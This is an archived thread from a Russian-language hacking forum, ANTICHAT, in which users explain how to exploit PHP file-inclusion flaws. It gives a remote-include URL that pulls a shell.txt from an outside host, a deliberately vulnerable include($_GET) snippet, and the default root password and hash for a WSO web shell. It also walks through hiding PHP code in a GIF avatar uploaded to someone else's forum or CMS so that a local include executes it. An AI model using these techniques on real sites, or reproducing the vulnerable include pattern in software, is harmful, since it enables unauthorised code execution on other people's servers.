ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

11.11.2009, 01:13
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
да
|
|
|

11.11.2009, 01:20
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
а там пароль по умолчанию не знаю  ( только есть хэш: 63a9f0ea7bb98050796b649e85481845
а зачем папка WSOmanager ? там что ?
кстати, а как тогда направить инклюд, если этот шелл требует авторизацию?
темно как то мне ....
|
|
|

11.11.2009, 01:22
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
root пароль, там комент должен быть:
63a9f0ea7bb98050796b649e85481845 // root
как то так, не помню точно.
И хватит оффтопить в теме.
|
|
|

12.11.2009, 22:52
|
|
Участник форума
Регистрация: 03.08.2009
Сообщений: 103
Провел на форуме: 413428
Репутация:
13
|
|
index.php?page=http://nabstre.tu2.ru/shell.txt? вот почему в конце ? никак не пойму,
если можно то плиссс с примером исходного кода
|
|
|

12.11.2009, 22:56
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
Сообщение от B0o0M
index.php?page=http://nabstre.tu2.ru/shell.txt? вот почему в конце ? никак не пойму,
если можно то плиссс с примером исходного кода
http://forum.antichat.ru/thread23501.html
см Примечания к перовму разделу
|
|
|

12.11.2009, 23:18
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
Бум, елементарный пример:
PHP код:
<?
$re = $_GET['re'];
include($re.".php");
?>
localhost/script.php?re=http://localhost/shell.txt?
|
|
|

13.06.2011, 02:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 4285
Репутация:
0
|
|
Сообщение от None
Можно залить gif картинку и поместить в конец простенький шелл подставить
Код:
Code:
php highlight:
при инклуде картинки она проинклудится не как картинка а как php код...
прочел на форуме одном
можете подробней описать сей процесс ? ни как дойти не может
|
|
|
|

13.06.2011, 02:11
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Смотри... У тебя есть локальный инклуд. Твоя задача - подставить туда такой файл, чтобы выполнялся твой код. Ищешь какие-нибудь форумы, cms'ки и т.д. Регаешься там. И заливаешь туда картинку как аватарку. Но до этого в конец этой картинки вставляешь свой код. Таким образом, проинклудив эту аватарку, у тебя есть выполняется твой evil-code.
|
|
|

13.06.2011, 02:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 4285
Репутация:
0
|
|
Вот так я вижу gif-ку с блокнота.
??
Принцип работы уязвимости понял. С картинкой вопрос только. Че да как редактировать.
|
|
|
|

13.06.2011, 02:45
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме: 2083691
Репутация:
330
|
|
а что не ясного то?
открыл блокнотом, запихнул, сохранил.
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books PHP
|
FRAGNATIC |
PHP |
186 |
21.02.2010 02:41 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|